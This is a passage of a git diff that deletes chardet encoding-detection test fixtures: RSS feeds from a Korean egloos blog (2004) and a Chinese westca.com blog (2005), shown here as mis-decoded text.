    - - <![CDATA[ ¹ְּ־°ת µ־²¨÷ס ]]> - http://zangsalang.egloos.com/623348 - - °¡² ְ¿¬ְַ ַ»ףְ» ÷¸°ם »‎±ה ְ¼³ְ» µט°ם ְײְ¸י ֱ₪¸» ±׳ °ְּֽ ַׁ³¹ ְּ¾±ג°¡ ¾ֶ´ֿ¶ף ¾מֲ¼¸י ֱר½ְֱַֿצµµ ¸נ¸£°´´ֲ »‎°¢ְּ µי°ןַױ´ֿ´. ֱ₪¸» ¿ל½÷¿מ ¾ך±גֱצ¸¸ ְ¼¼ָק ÷¸°ם ְײ³כ¶ף¸י ¾מ´ְ»ץ ְּ¾±ג ¼׃ְ¸·־ »¡·ֱ µי¾מ°¡¼­´ֲ ¸ֲ¾ֶ!! ¸ֲ¾ֶ!! ±׳·¸°װ ¿ִ¡°ןֱַֿצ¿ה...
    -
    -ְו°¡°ט¿¡ °¡¸י ÷¸÷ְָ£¶ף´ֲ ¹ְ־°רָ£¼צ°¡ ְײ´ה´ֿ´. ¹ט¸¦ ֵ¸°ם ְ¯¶קְ» ַֿ¸י ְו°¡°ט ¿רֱײ¹־ְ־ ֵה°¡ֱ· ¾ֶ°¡¾¾¿ֽ ֳׁ°¢ְּ ³×¿ֽ¼­ ¸µי¾מֱר ¸ס¼ׂ¸®·־ ³כ·¡µµ ÷ׂ·¯ֱײֱצ¿ה. ְּ ָ£¼צ ְ¯¶קְַ ¸¶ֱצ¸·¿¡ ´´¸£¸י ֱ₪¸» ±ג¹¦ַׁ ¹ְ§°¡ ְײ´ֲµ¥ ¹·־ ¹ְּ־¹ְ§¿ֽ µ־²¨÷ס¹ְ§ְװ´ֿ´. »ח¶ק¸¶´ ְֲ¸·־ ¸¹ְ÷ ְּ¾±ג¸¦ ¸¸µי¾מ ³»°װ ַֿ´ֲ ¹ְ§ְ־µ¥ »‎±ט»ץ°¡ ֲ ¿ְ¹¦ַױ´ֿ´. ¹·־ ¹ְּ־ְַ ¿·¸נ½ְְּ¶ר´ֿ´. ¹° ְ§·־ ´¼ׂ°קְּ ´¹® ְװ°ת ¿ְ¶ַָׁ ִµµ ÷¸ְּ°ם »לֲ¦ ²¿÷־¶ףֱר ¾ױ ¸׃¸®¿ֽ ³פ°װ ֶ²¾מ ¿ֳ¸° ½¢ְּ ¸¹ְ÷ ±ה ¸׃¸®...
    -¾מ¶² »ח¶קְ÷ ַֿ´ֳ¿¡¼­ ³»·ֱ ¿ֲ ¼±³א°¡ ¸ס¿וְ» ַׁ´°םµµַֿ°ם ¾מ¶² »ח¶קְ÷ ְּ µ¿³׳¸¦ ֳ£¾ֶ ¿ֲ ·¯½ֳ¾ֶ ֳ»³ג°ת ֵה°¡ֱ· ¾ֶ°¡¾¾ְַ »ח¶ְַ °ב½ְַּ¶ף°םµµ ַֿ°ם...ַֿ¿©°£ ÷¸´ֲ »ח¶ק¸¶´ ¹ְּ־ְּ¶ף°ם ִ×¼ְּ ְְַׁ ¾ֶ°¡¾¾ְ׃¿¡´ֲ ֶ²ְ׃ְּ ¾ר´ֲ °ֽ °°½ְ´ֿ´.
    -±׳·±µ¥ ´ץ °ז¾ַַׂ ְּ¾±ג¸¦ ֳײ± µי¾מ ¸¸µי¾מ ³ֲ´ץ±÷¿ה. ¹·־ ¾ױ¿¡ ְײ´ֲ ְ±׳¸¶ַׁ ¹ְ§°¡ µ־²¨÷ס¹ְ§ְװ´ֿ´. ¹ְּ־ְּ ¸ס¿וַֿ´ֲ °ְֽ» ¸פ·¡ ֳִָֹ ÷¸¸י¼­ ֱֱ¾ֶ¶ףַֿ´ֲ µ־²¨÷ס ³א¼®!!!! ְּ ³א¼®ְּ ָך¸° ִ§ְּ ÷¸÷ְָ£¸¦ ¸¸µי¾ת´´ֲµ¥...
    -ֱֲ...ְּ·± ְ¼³ְ÷ ֱ» »ח¾חַֿ°ם ½ְֽ÷µ¥..^______^** - ]]> -
    - ְו»ח¶ְַ ±ג¾ןֳ¢°ם** - Tue, 13 Jul 2004 04:20:08 GMT -
    - - <![CDATA[ ´ְּ¾מֶ®ְַ °ם¹־ ]]> - http://zangsalang.egloos.com/604370 - - ¹ת½ב 7¿שְװ´ֿ´. ÷»°ְְ־ ¿©¸§ְֱּצ¿ה. ¾ף¸¶ ¾ְָײְ¸¸י µ¿ַ״, ¼­ַ״, ³²ַ״...ַ״¼צ¿וְוµיְּ ְֱֿ¦ָק °³ְוְ» ַֿ°ֱצ¿ה. ÷סµµ ¿ְֱצ ¾´ֲ ְו¸¶°¡ ³¡³×¸י ÷»°ְְ¸·־ ָ°¡ֳ¶ְּ µֵֹ׳°ם...±׳·¯¸י »ח¶קµיְ÷ ¹÷°¡¿¡ ָ¦¸°µםְּ ¹´·־..¹´·־ ¸פ·ֱ °¡ֱצ¿ה. ְ¿­ַֿ´ֲ ֲֵ¾ח°ת ¸נ·¡»חְו, ½ֵ³×´ֲ ¹°³מְּ¿ֽ ³×¸¦ ±ג´¸®´ֲ ְת ִֶ¶ץ ¹´.....
    -±׳..·¯..³×..
    -±׳ ְ¿¡ ַ״¾ַׂ ְְּֿ ְײ½ְ´ֿ´...»לµיְַ ֱ₪¸®ֱ₪µ·..´ְּ¾מֶ®..₪ּ₪׀
    -¹°·׀ ½ֶַ׀ַֿ´ץ¶ףµµ ¹´ְַ ְת ¾ײְ‎ַׁ ÷־¸§ְ» ¸פ¶ף¶ףֱַֿצ´ֲ ¾°ֱצ¸¸ ְּ¿ױְּ¸י »לµיְ» ֱ» ֱ₪¸®ֱ₪µ·ַֿ°ם °¡°ם ½ֽ½ְ´ֿ´.
    -
    -ִִ¡¹צ½÷ ±ג»ח ¾ְֶת¾¾°¡ ָ£ֵ±מֱצ °¡´ֲ ±זְ» ְ ¸נ¸£¼ֵ¼­ ÷£´ֿ½÷ ±±³ְַ ָ£ֵ¿¡ µµֲרַׁ ½ֳ°£ְּ ¹ד 10½ֳ¿´½ְ´ֿ´. ´ְ½ ³¯, ְְֲּֿן ְֿ¾מ³×¼­ ָ¥ְ¼­ µנִ«¸¦ µי°ם ¾ִֶ§ »ךֳ¥ְ» ³×°¬ֱצ¿ה. ¼¼»ף¿¡³×!!! ָ£ֵ ¾ױְֲ¸·־ ְּ·± ַ״¼צ¿וְוְּ ְײ¾ת¾מ¿ה. ¾מֲמ³× ְּ»´רֱצ...¾ֻ°ם ÷¸´ֿ ְּ µ¿³׳°¡ ¿©¸§ ָ¾חֱצ¿´³׳¿ה. ְּ¸¥ ¾ִֶ§ְּ°ם ¾ֱֶק ָ°¡ֳ¶ְּ ¾ֶ´ֿ¶ף¼­ »ח¶קµיְּ ¾ר¾תֱצ¸¸ ¿©¸§ְּ ±׳¸®¿צֱצ°װ ¸¸µו´ֲ ַ³°זְֱּׂ??
    -ְ!!! ¹´°¡ ¿ל¸®¸¦ ±ג´¸®°ם ְײ½ְ´ֿ´.
    -¶°³×ְ...¹´·־!!!
    -
    - ]]> -
    - ְו»ח¶ְַ ±ג¾ןֳ¢°ם** - Thu, 1 Jul 2004 13:26:50 GMT -
    - - <![CDATA[ ¾¾¿רַׁ »ף»ף!!! ַצ½ְַּ µַ´... ]]> - http://zangsalang.egloos.com/601098 - - -¿הֱעֳ³·³ ַ״°¡ »ך¶זַֿ°װ ¶ב °ֽµµ ¾ֶ´ׁ °ְּֽ..ְו¸¶¶ף°ם °ר±ג´ֲ ¹°¿¡ ַ« ְ‎¾מ ְײ°ם..±ג¿ְֲ÷ »ף½ֲַֿ¿©...ִָ´‏ֱצ±ַֿ°ם ֵ׃ֵ׃ַׁ ¹°±גµיְּ ³» ¿ֲ ¸צְ» ´×ֱרַֿ°װ °¨½־°ם ְײְ¸¸י, ³» »ל°ת »לְּ ¸¶ֱײ ִ¡´ֲ °ֽ ֱ¶ֲקµµ °µנ±ג ָµח °םֵכְ¸·־ ´°¡¿ְֱצ¿ה...ְּ·² ¶§ ¿ֲ »ח¹זְּ ¾ףְ½ְ¸·־ µָ ±ְְֳּ ְײ´¸י ¾ף¸¶³× ֱֱ°½ְ´ֿ±מ??
    -ַֿ..ַֿ..ַֿ... »ף»ףְּ ַצ½ְַּ µַ¾מ ְּ·¸°װ ´« ¾ױ¿¡ ³×ֵ¸³× ֱ״´¸י...
    -
    ְ¯·´ְַ ֱצ÷״..ְ¶ֱַ¶ף¿ל..ַ״¹ 3454¹ֵּֽ..¸¸³ג¼³°ת ÷שַֿ·־ µ₪ָש ְּ °קְַ ¾ֶ¸§´¿עְ÷ ¼³¸ם ÷ׂ°¡..°ם»ךֱץְ¸·־ »ח¶קµי ֶֶ ±ג¾מ°¡´ֲ »ףָ²¿¡¼­µµ °¡»׃ַֿ°װ ¾א°£ְַ ¾מֱצ·¯¿עֱץ¸¸ ´ְ³₪ ְתְַ ½ֳֵ¼¿¡ °¨»חµו¸³´ֿ´...
    -ְ¶ֱַ¶ף¿ל ÷שְַַֿ µ־²²°¡ ¾א 700¹ֵּֽ¶ףֱצ¿ה. ÷שְַַֿ 30¹ֵּֽ ¾ֶ·¡¸¦ ִֶ¼­ ¹ּ·־°°ְ÷ ±זְ» ¸¸µי°ם ¾ףְ½ ֱ¶°¢±מֱצ °חµיְ־ ¸ֱר °קְּ ְײ½ְ´ֿ´. ְּ¸§µµ µ ¸ֲ°װ ¾ףְ½±ְֳ...
    -±׳³ֹ ÷¸±ג¸¸ַ״µµ ¾¾¿רַ״ ֱצֱצ ¾³×¿ה...
    -´‎ְ¸·־ ְ¶ֱַ¶ף¿ל ְ¸ֱ´כְַ ´«¹¶ק±מֱצ µו¸³´ֿ´...
    - ]]> -
    - ְו»ח¶ְַ ±ג¾ןֳ¢°ם** - Tue, 29 Jun 2004 17:39:25 GMT -
    - - <![CDATA[ °ר¹«¿ר ÷סµׁ±גµי..^^ ]]> - http://zangsalang.egloos.com/597549 - - ¹°ְַ µµ½ֳ ÷£´ֿ½÷...
    -¿ל½÷°³ ¼ׂ¸® ַֿ³× ַ״µו¸±±מ¿ה?? °¡² ְֵּ»¸®¾ֶ¸¦ ¿©ַאַֿ½ֳ´ֲ ¼ױ´װµי ֱ¿¡´ֲ ¿©ַאְּ ֱ¹ְ» ³ׁ¾מ¼­¸י¼­ ÷£³׳ִ¡¾ֶ´ֲ ¾נֱ¦ °¡´ְ³ִ°ם ¾ך±גַֿ½ֳ´ֲ ÷׀ְּ °ט¼¼¿ה..ַַֿֿ...
    -ַי₪ׁ₪ׁ;;; ֱ₪¸» ¿ל½÷°³ ¼ׂ¸®ֱצ¸¸...ֱ₪¸» ±׳·± »ח¶קְּ ְײ´ה´ֿ´...÷£´ֿ½÷´ֲ ¿µ¾מ½ִ ¹ְ½ְּ°ם ְֵּ»ְּ¾ֶ¿¡¼­´ֲ ÷£³׳ִ¡¾ֶ¶ף°ם ֱַֿצ¿ה. ¸¶ֲש°¡ֱצ·־ ֳַ·־·»½÷´ֲ ¿µ¾מ½ְִּ°ם ַַ·»ֳ¼°¡ ְֵּ»¸®¾ֶ¾מֱצ¿ה..^^ ¾ֶ°ם°ם...¾µµ¥¾ר´ֲ ¾ך±ג¸¦...
    -
    -÷£´ֿ½÷¿¡¼­ °±₪°´µיְּ °¡ְו ¸¹ְּ ֳ£¾ֶ °¡´ֲ °קְֱַ ַֿ³×°¡ »ך¸¶¸£ִ±₪ְוְװ´ֿ´. ´½ֳ ַׁ¹ר...^^»ך¸¶¸£ִ¸¦ ¿µ¾מ½ִ ¹ְ½ְ¸·־ ÷־¸£¸י ¼¼ְ־ֶ® ¸¶ֵ©°¡ µֻ´ֿ´. ¿ל¸®°¡ ָחָק ÷־¸£´ֲ ¸¶°¡÷¹ְ½ְַ ¸¶°¡¼÷ְ´װְּ½ֱֳׂ. 12¼¼±ג¶§ ¿מַֿ¸¦ ¸ֵ¸³ַ״¼­ ¼¼¿צֱר ְּ ±₪ְוְ÷ 16¼¼±גֲכ¿¡ ֱ¦´כ·־ ¸נ½ְְ» ¿ֿ¼÷ַ°ם ַצְחְַ ¸נ½ְְ÷ 19¼¼±ג¶§¶ף°םַֿ³׳¿ה. ַצְח ְ¯·´¿¡¼­ ֱ¦ְֿ ֵ« ±₪ְוְּ¶ף´ֲµ¥ ֱ₪ָ®ַֿ°װ ֱק»ח°¢ְַּ¿¹¿ה.
    -ְּ ±₪ְוְּ ¿©ַא°´µי¿¡°װ ְ־±ג°¡ ְײ´ֲ °ְֽ÷ ±₪ְוְ» µׁ·¯ ½־°ם ְײ´ֲ ±ְֳ°ת ¼÷´ח °°ְ÷ °ם°ֳַא¹°¶§¹®ְּ±גµµ ֱַֿצ¸¸ ¼צ½¸¸¸¶¸®ְַ ÷סµׁ±גµµ ַׁ ¸עְ» ַׁ´ה´ֿ´. ±₪ְו °ק°ק¿¡´ֲ ְּ´®ְַ ÷סµׁ±ג¸¦ ְ§ַׁ ¸װְּ¸¦ 1ְ¯·־¿¡ ֶַ¸ֵ¸¦ ַֿ°ם ְײ½ְ´ֿ´. 1ְ¯·־¸י ¾א 1500¿ר ֱ₪µµְ־µ¥ ¸װְּ´ֲ ÷°°ֵ ¾ֶ´ױ´ֿ´. µµַׁ ¿ֱ¼צ¼צ ¾ֻ°»ְֱּׂ. ¿ֱ¼צ¼צ ¾ֻ°»ְּ¸¦ ַׁ ֱ ְ¶א ֱד°ם ¼ױ¹´ְ» ֲׂ~¾ַ ֶל¼­ ְֶָ» ֲ~¿ם ¹ת¸®°ם ¼­ ְײְ¸¸י ְּ·¸°װ ÷סµׁ±גµיְּ ³¯¾ֶ ¿ֲ´ה´ֿ´. ¿ְ¿ל!! ±µ¥ ÷סµׁ±גµיְּ »‎°¢÷¸´ ¸¹ְּ ¹«°ֵ¿צ¿ה. ַׁ¸¶¸®°¡ ³¯¾ֶ ¿ְ¸י µ ְּ¾מ¼­ ¿©·¯¸¶¸®°¡ ¿ְ´ֲµ¥ ¼­³¸¶¸®¸¸ ֶָ¿¡ ¾ֹ¾ֶµµ ±׳ ¹«°װ¿¡ ָײֳ»ַׁ´ה´ֿ´.
    -±׳·±µ¥ ¿פ±ג´ֲ°ַ¿ה....»ך¸¶¸£ִ ±₪ְוְַ ÷סµׁ±גµיְ÷ ÷£´ֿ½÷ ½ֳ¿¡¼­ °¸®¸¦ ַֿ°ם ְײµ¥¿ה. ´ץ ¿פ±ג´ֲ °ְֽ÷ ¿ה³נµיְּ °±₪°´µיְּ µי¾מ ¿ְ´ֲ ½ֳ°£°ת ³×°¡´ֲ ½ֳ°£ְ» ְ ¾ֻ°ם ְײ¾מ¼­ ½ֳ°£ ¸ֲֳח ֳג±ַֿ°ם ֵנ±ַׁ´³׳¿ה...ְ½...±׳¸¸ַֿ¸י °ר¹«¿רַׂ¸¸ֱַֿׂ^________^** - ]]> -
    - ְו»ח¶ְַ ±ג¾ןֳ¢°ם** - Sun, 27 Jun 2004 16:11:54 GMT -
    - - <![CDATA[ ְּ°ֵ ´©°¡ ֲן¾ת¾מ?? ]]> - http://zangsalang.egloos.com/594634 - - -(½÷½÷·־ °¨ֵ÷!!)
    -
    ´÷ֱת·£µו ³²¼¶ְַ ֵ׳ִ«ֶקָ£¼צְװ´ֿ´. ´÷ֱת·£µו ָ£¼צ ְּ¸§ְ÷ ´כ÷־÷׀ ¸¶¿ְ¸®¾מ·־ µַ¾מ ְײ½ְ´ֿ´. ¾ן¾חְּ ´¼ׂ ¾ן¼¼±ג´ֲ ֱַֿצ¸¸ ¿״ֱצ ְּ±¹ְְּ°ם ½ֵ÷ס·׃´´ֲ ´ְ³¦ְּ µיֱצ¿ה. ֵ׳ִ«ֶקµµ ¸¶¿ְ¸®¾מְ־µ¥ ´כֳז ¶זְ» ַ®ְְַּֿ¸י '¹דְַ ִ§³¶' ְּ¶ף°ם ַֿ¸י µֹ±מ¿ה??
    -ְּ·¸°װ ְּ¸§ְּ ֱצ¾מֱצ°װ µָ ְְּ¯°¡ ְײ½ְ´ֿ´. ¸ײ¸® ´÷ֱת·£µו±מֱצ °ַ³ ¿ְ°װ µָ ֳ±גְַ ¸¶¿ְ¸®ֱ·µיְ÷ ¹ּ±¹ְַ ¼­÷־°³ֳ´ְµיֳ³·³ ְּ ¶¥ְ» °³ֳ´ַֿ±ג ½ְֳַ½ְ´ֿ´. ³²¼¶ְ¸·־ µי¾מ ¿ֲ ַׁ ¸¶¿ְ¸®ֱ· ¹«¸®µיְּ ¾מ´ְ ³¯, ְּ ָ£¼צ¿¡¼­ ¾¿µְ» ַֿ°װ µַ¾ת´ה´ֿ´. ±׳·±µ¥ ַׁ ¹דֱ¿¡ ¸נµ־µי ¼³¸םַׂ ¼צ ¾ר´ֲ °רֶק¿¡ ֱת·ֱ¼­ ִ§³¶ְ» µׁ·¯ ¾´ ֳ¼·־ µµ¸ְֱ» °¡¹צ·ָµ¥¿ה... ±׳·± ְּ¾±ג¿¡¼­ ְּ ָס¾ַָׁ ְּ¸§ְּ ְ¯·¡µַ¾ת´°םַֿ³׳¿ה..^^
    -
    -ֳײ°ם ¼צ½ְֹּ 700¹ֵּֽ°¡ ³ׁ´ֲ ֵ׳ִ«ֶק ָ£¼צ´ֲ ÷שַֿ°¡ ³ל¾ֶ¼­ ¸¸µי¾מֱר ָ£¼צֱׂ. ְת ½ֵ÷ס·׃°ם ¾ֶ¸§´¿מ ַ׸¥ ÷ְ÷ 2¸¸³גְּ ³ׁ´ֲ ¼¼¿שְַ ָחְְּ ³ל¾ֶ¼­ ¸¸µי¾מֱר °ְּֽ ¾ֶ´ׁ°¡ַ״¿ה. ֱצ±µµ ְּ ָ£¼צְַ ¹´¿¡´ֲ 2¸¸³ג µ¿¾ָ ÷שַֿ¿¡ ְַַ״ ִ§ְµָ µ¹µיְּ ±ע·ֱ ְײ´°םַֿ³׳¿ה.
    - - ]]> -
    - ְו»ח¶ְַ ±ג¾ןֳ¢°ם** - Fri, 25 Jun 2004 14:41:53 GMT -
    - - <![CDATA[ ´©±¸ְַ ¾ף±¼ְ־°¡? ]]> - http://zangsalang.egloos.com/592609 - - ֳ³ְ½ ¸¶ִ«¿ְ¸¦ ֳ£¾ְׂ» ¶§, ¹צ½÷¸¦ ֵ¸°ם °¡´°¡ ֲקֳ¢ ¹ְ¸·־ ַׁ ¿©ְ־³׳¸¦ ¸¸³µ½ְ´ֿ´. ±׳ ְ־»ףְְ־ ¸נ½ְְ» ְ¼¼ָק ÷¸°ם ½ֽ¾ת´ֲµ¥ ±׳ ¶§´ֲ ±׳·² ¼צ°¡ ¾ר¾תֱצ¿ה. ±׳·¯´°¡ ´½ֳ ¸¶ִ«¿ְ¸¦ ֳ£¾ְׂ» ¶§ ָ¥ְ¼­ ±׳ ¿©ְ־³׳¸¦ ֳ£¾ֶ °¬ֱצ¿ה. ±׳ ¿©ְ־³׳°¡ ´©±¸³ִ±¸¿ה??
    -
    -¸¶ִ«¿ְ ¾ױ ¹´¸¦ µמֱצ°ם ¼­ ְײ´ֲ ³פְּ 20¹ְֵַּֽ »חֱר ¼׃ְַ ְּ ¿©ְ־³׳ְַ ֱ₪ֳ¼´ֲ ¹·־ °ְ½÷¸»ל»ףְּ¿´½ְ´ֿ´. ¸¶ִ«¿ְ´ֲ ֶק·חֵץִ®ְַ ½ִ¹־ֱצ¿´½ְ´ֿ´. ְּ °ְ½÷¸»ל»ףְ÷ ֶק·חֵץִ®¿¡¼­ ¸¸µי¾מ¼­ ¸¶ִ«¿ְ¿¡ ¼¼¿צֱר °ְֽ־µ¥ ³×¸§µ¥·־ »‎°¢ַ״¼­ ¼¼¿מ °ְֱּֽצ¸¸ ¿×½ֳ ְֲ¸·־ ¾ײ¸ֵַׁ ְְֲֵּ±÷¿ה. ¾ף±¼ְ» °¡¸¸ָק ֳִ´÷¸°ם ְײְ¸¸י µ¿¾חְ־ְּ¶ף´ֲ »‎°¢ְ÷ ְַפ µיֱצ ¾ֱצ¿ה. ¾מµנ¼­ ¸¹ְּ ÷» µםַׁ ¸נ½ְְ־µ¥... ְֳ¼ְְ¸·־ ¼÷¸נ ¸¶¸®¾ֶ¸¦ ´אְ÷ °ֽ °°±גµµ ַֿ°ם...ְֲֵ´ֲ °ְ½»ףְּ ¸ֲ´ֲ °ֽ °°±גµµַֿ°ם....ֱצ±µµ ְּ ¸¶ִ«¿ְְַ °ְ½»ףְ÷ °זִ¡ ְֱֱ÷ ¹´¸¦ µמֱצ°ם ¸¹ְ÷ ¿©ַא°´µיְַ ½ֳ¼±ְ» ַׁ ¸צ¿¡ ¹°ם ְײ´ה´ֿ´. ְּ °ְ½»ףְ» ¹¶ף÷¸´ֲ µ¿,¼­¾חְַ ¿©ַא°´µיְ÷ ¼­·־ ¾א°£ְ÷ ´¸¥ »‎°¢µיְ» ֵַׂ׳ֱצ¿ה...
    -¾ֶ¸¶µµ ְּ °ְ½»ף ½÷½÷·־°¡ ְ½ְֵּ ´©±¸ְ־ֱצ ְַ¹®½÷·¯¿ןֱצµµ ¸נ¸¨´ֿ´...
    -
    -¸¶ִ«¿ְְַ °ְ½»ף°ת´ֲ ÷°°³ְַ ְּ¾±גְֱּצ¸¸...
    -±ט¼±ְֿ¾¾ְַ ַַ»ל »ח°ְַ» ֱ¢ַֿ¸י¼­ °ת¿¬ ¿ל¸®ְַ ¾ף±¼ְ÷ ´©±¸ְַ °ְֽ־ֱצ ֱ» »‎°¢ְ» ַ״÷ֱ¾°½ְ´ֿ´.... - ]]> -
    - ְו»ח¶ְַ ±ג¾ןֳ¢°ם** - Thu, 24 Jun 2004 12:04:11 GMT -
    -
    -
    diff --git a/chardet/tests/GB2312/14.blog.westca.com.xml b/chardet/tests/GB2312/14.blog.westca.com.xml deleted file mode 100644 index 3c2249a..0000000 --- a/chardet/tests/GB2312/14.blog.westca.com.xml +++ /dev/null @@ -1,180 +0,0 @@ - - - - - ¼׃־ק¹«ֹח־ֲ¸ח»×´ף¶׃ֿעׁפֹת²ת¶׃־ֲֵ¯׀¡·ײ¶׃ - http://blog.westca.com/blog_wencheng/index.html - ַו·חµִֹשׂפַבַבֹ¨¹‎µ״ֳז£¬ַו·חµִ·¼ֿד£¬ַ¾­־ח÷ף±©׃ךֿ´µ׃»ע½‏¹‎ֹֻֿדµִ£¬ױג²ֵַ־ֻׂשװ¸ּ‎װ¸־ֵµִ¡£ - zh - - hourly - 1 - 2000-01-01T12:00+00:00 - - - - - - - - - - - - ֿכׂ×·ֹ ָ´װץֳ´ׁשׂ²·ֹ²»¸ - http://blog.westca.com/blog_wencheng/p_full/51156.html - 2005-12-21T22:51:36Z - ־ֲ³ַ - ּלּלֿסֹֿ - ׀ִּרֱֲֻׂ½׳א ֳ־ׂ²²»׳װ׃ֹ¡£¡£¡£¡£¡£¡£ - - - -
    -]]>
    -
    - - װ׃ֲ - http://blog.westca.com/blog_wencheng/p_full/50829.html - 2005-12-19T07:29:37Z - ־ֲ³ַ - ׀ִַיװ‎¼ַ - ¶¬¼¾µִָױ׳׃»¬ׁ©ַ׳מ÷ֳµִװֻ¶¯ֱֻ£¬װחװחֲעֱֻ»¬ׁ©µִ¼¾ֶ±£¬ָױַ°ֹֹֿ½ֱ½´־£¬¸׀¾ץױ‎»ײ¸´ײ׀¡£־ִ־£¬ֱ¬ָױµִּלֶרַח÷ֳ£¬ׁ©ײױ׃¼²»׳¡ֱֻ¡£ײ×µְ´ֻ±µִֹ½ֹֿ£¬¼´±ד¿×·ֵ£¬»¬ֶנְ´µִ¸׀¾ץׂ²÷ֳ²»µ½ְִִןָ¥£¬׃ַ£¬¿ױֿ׀ְֲֿ´±ד¸ְִֵֹ½ֱֻ¡£ - -ֹֿײָױָ¥ֱֻsquamishµִ¶‏ָ‎ֱ½·ו£¬ֳקֿװ¸׀¾ץּוֱ¦´ף²»ָחַ°£¬׀×ֿ¢ּ«¾ֳ£¬ּוִַ»בֲֿ½µµִ£¬ֻהָ»ֹ½¶¥·ח¹ג־ֿ£¬ְ׀©ׂ²ײµ¡£ - -¥µ®½«ײֱ£¬´ף׀¡ֹּ³¡¶¼׃µ¼·ֳ¦ֲµ£¬׀ם¶א־ןֶ·ְ¦°ףֿת£¬½µ¼·ש¶ָ׳װָ»²»׀¡£¬µ±ָ»£¬ָח¹²»ַֹת»מ±״±¸µִ־ןֶ·£¬µ½²»ׂ»¶¨·ַµֳ´ױ´ִָָֻײ¡£¼¸ָױַ°£¬ָ¥ֱֻׂ»»״ֹּ³¡£¬ֽ£³µ³¡¿´µ½׃׀²´³µײ±½׃׳²µ½ֱ³µµִ£¬¿×³µµִַׂ»°׳ָֻ¸¾ָֻ£¬ׂ²ֳ»׃׀׀´ײ½ּץ¸ר±»׳²µִֶ³µ£¬־ׂ¿´ֱֻֻ‎ׂ»ׁ£¬ָ»÷ף¸זֻֻ‎ׂ×׀´ױֵײ½ּץ£¬µָ־ׂ°לֽךֲ¿´µ½ֻ‎ֱׁׂן׳£¬±»׳²ֶ³µ»¹װװ­µ״£¬¿ֱֹ¯µִ³µײק£¬»¹²»ײ×µְױ¦»״ֲ¡£ - -׳עֽם־×ֱֹֻת´ז£¬ְ´»״±¼²¨׃כֱ½¸צ±םׁ³¡ֻש£¬³×׳דֱֱֻ½׀¡±¸טַת£¬¸¹²¿¸׀¾ץ׃׀ּ£¬ײ×µְַ׃ֳֶרֻשײֲ£¬־°­£¬ׂ²¼לׁיֱֻ׳װ¼÷£¬¿´ְ´£¬־´ְ´ָח׃׀»ת»ב¿×ׁ³×»ב£¬²»ֲֵ³×²»ֽךָ«³¡¡££÷£©²»¹‎£¬ֶהײ׀ׁ³×ײֱׂ»׳¸טַת£¬ׂע־×»»ֶרּ«ֳֽ£¬±»׳װ¼÷µִ¿ֻ®ֻשַ÷£¬¾ה׳׃³×ְ´¶ֿ¶ֿ׀ר׀ר£¬÷ֳװ÷¿לµקױ£¬»ײ¸´ָח³ץ¡£÷ַ÷ַ£¬²מµדְֲֿם§ַ°ּד¡£ - -½סּל÷ֽׂ¶׳׃½ד¡¢׀ה׳׃װ¼÷ֳָ¥¾ֵ¼ַ£¬ֹּ³¡ַ°ֽ£³µ־»÷ִׁױׂ£¬÷ֳ²»ָׂ׳ױׂµ½ׂ»ֽ£³µ־»£¬׀ה׳׃ױ‎µ¹³µֽש¿ױ־»»½רײ®¼£¬ִֻ¸צ־קַָֻאִך¼³µײ±´³ױ¼ָכ׀ה׳׃־´½רµִ³µ־»£¬ֱמׂ»±µִ׀ה׳׃ֶר·ױ²»ׁׂ£¬´ףֹשֳשµׁ£¬־ִ־£¬־קָֻ־׃£¬»¹ְקֹשײ־׀ה׳׃־×÷־²»װ₪׳קײ¸¾£¬ָ»÷ףׁן³₪¶רָ¥¡£ֻ­ֻµ־קָֻµִֻ״ײ¸£¬ױג¾ַֽ°סׁש÷ֽ´ת±םֱֻ¡£ - -¥µ®µִׂפְײֻז´¦¿ֹ־ֵ£¬ֳ¦ֲµµִ½ָױ£¬׃׀ֳָֻ¦׳ֵ¿×party£¬׃׀ֳָֻ¦׳ֵ¹÷־ן£¬׃׀ֳָֻ¦׳ֲֳֵ׃־¡£¡£¡£¡£־ׂ£¬ֳ¦׳ֵֹת»מ£¬µ±ָ»£¬ֹת»מַ׀ֱ¿אµִ£¬׀ֱ¿אׂ²ײ₪ֳק׳װ¼÷»¹»מ׳ֵ£¬²»¹‎£¬׀ֱ¿אµִֽ¬±ׂ²²»»ב¿ק´‎׳װ¼÷£¬¸ֳ׃יְײµִ±÷ע׳װָ»²»»בְ­ֲֿ¡£ֻהָ»ֳ¦ֲµ´ת±ם׳װ¼÷µִ־ִ£¬ֽ¬ׁש£¬ׂ²´ת±םֱֻ׳װ¼÷µִ׃׀ִ£¬±חײ₪ַ°ֹ£¬ֿכָ¥°ֹ¡£ - -ּשׂ»ױֵָ¥ֹ½¶¥ִֵµִױױֶ¬£¬´ֵֻ®µ¯ּר¼«÷ֳ£¬ַא³צ׃ְ¶£¬÷ַ÷ַ¡£[...] ¸¶א - -
    -ֹֿײָױָ¥ֱֻsquamishµִ¶‏ָ‎ֱ½·ו£¬ֳקֿװ¸׀¾ץּוֱ¦´ף²»ָחַ°£¬׀×ֿ¢ּ«¾ֳ£¬ּוִַ»בֲֿ½µµִ£¬ֻהָ»ֹ½¶¥·ח¹ג־ֿ£¬ְ׀©ׂ²ײµ¡£
    -
    -¥µ®½«ײֱ£¬´ף׀¡ֹּ³¡¶¼׃µ¼·ֳ¦ֲµ£¬׀ם¶א־ןֶ·ְ¦°ףֿת£¬½µ¼·ש¶ָ׳װָ»²»׀¡£¬µ±ָ»£¬ָח¹²»ַֹת»מ±״±¸µִ־ןֶ·£¬µ½²»ׂ»¶¨·ַµֳ´ױ´ִָָֻײ¡£¼¸ָױַ°£¬ָ¥ֱֻׂ»»״ֹּ³¡£¬ֽ£³µ³¡¿´µ½׃׀²´³µײ±½׃׳²µ½ֱ³µµִ£¬¿×³µµִַׂ»°׳ָֻ¸¾ָֻ£¬ׂ²ֳ»׃׀׀´ײ½ּץ¸ר±»׳²µִֶ³µ£¬־ׂ¿´ֱֻֻ‎ׂ»ׁ£¬ָ»÷ף¸זֻֻ‎ׂ×׀´ױֵײ½ּץ£¬µָ־ׂ°לֽךֲ¿´µ½ֻ‎ֱׁׂן׳£¬±»׳²ֶ³µ»¹װװ­µ״£¬¿ֱֹ¯µִ³µײק£¬»¹²»ײ×µְױ¦»״ֲ¡£
    -
